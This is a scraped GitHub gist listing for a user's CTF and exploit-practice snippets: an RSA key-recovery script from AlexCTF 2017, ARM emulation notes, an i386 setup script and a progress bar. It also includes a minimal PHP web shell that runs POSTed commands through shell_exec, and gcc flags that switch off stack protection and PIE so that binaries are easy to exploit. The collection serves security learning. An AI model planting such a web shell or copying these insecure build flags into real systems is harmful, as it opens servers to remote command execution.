Skip to content

Instantly share code, notes, and snippets.

View cExplr's full-sized avatar
🎯
Focusing

cExplr cExplr

🎯
Focusing
View GitHub Profile
@cExplr
cExplr / rsa_egcd.py
Created February 8, 2022 09:24 — forked from intrd/rsa_egcd.py
RSA - Given p,q and e.. recover and use private key w/ Extended Euclidean Algorithm - crypto150-what_is_this_encryption @ alexctf 2017
#!/usr/bin/python
## RSA - Given p,q and e.. recover and use private key w/ Extended Euclidean Algorithm - crypto150-what_is_this_encryption @ alexctf 2017
# @author intrd - http://dann.com.br/ (original script here: http://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import binascii, base64
p = 0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9
q = 0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307
e = 0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41
@cExplr
cExplr / ARMDebianUbuntu.md
Created December 21, 2021 06:15 — forked from bruce30262/ARMDebianUbuntu.md
Emulating ARM on Debian/Ubuntu

You might want to read this to get an introduction to armel vs armhf.

If the below is too much, you can try Ubuntu-ARMv7-Qemu but note it contains non-free blobs.

Running ARM programs under linux (without starting QEMU VM!)

First, cross-compile user programs with GCC-ARM toolchain. Then install qemu-arm-static so that you can run ARM executables directly on linux

If there's no qemu-arm-static in the package list, install qemu-user-static instead

<?php
<!-- from https://raw.githubusercontent.com/artyuum/Simple-PHP-Web-Shell/master/index.php -->
if (!empty($_POST['cmd'])) {
$cmd = shell_exec($_POST['cmd']);
}
?>
<!DOCTYPE html>
@cExplr
cExplr / compilevulnerable
Last active June 22, 2018 10:38
To compile for vulnerable exploitation binary
gcc $1 -o $2 -fno-stack-protector -z execstack -no-pie #for 64 bits
gcc $1 -o $2 -fno-stack-protector -z execstack -no-pie -m32 # for 32 bits
#! /bin/bash
platform=$(uname)
if ! [ "Linux" in $platform]
then
exit
fi
echo "Adding architecture"
sudo dpkg --add-architecture i386
echo "updating apt-get"
sudo apt-get update
echo "installing libc6"
sudo apt-get install libc6
echo "installing libstdc++6"
sudo apt-get install libstdc++6
echo "installing libcurses5"
sudo apt-get install libcurses5
@cExplr
cExplr / progress.py
Created November 24, 2017 08:42 — forked from vladignatyev/progress.py
Python command line progress bar in less than 10 lines of code.
# The MIT License (MIT)
# Copyright (c) 2016 Vladimir Ignatev
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the Software
# is furnished to do so, subject to the following conditions:
#
@cExplr
cExplr / custom-code-hover.markdown
Created September 26, 2017 05:33
CUSTOM CODE HOVER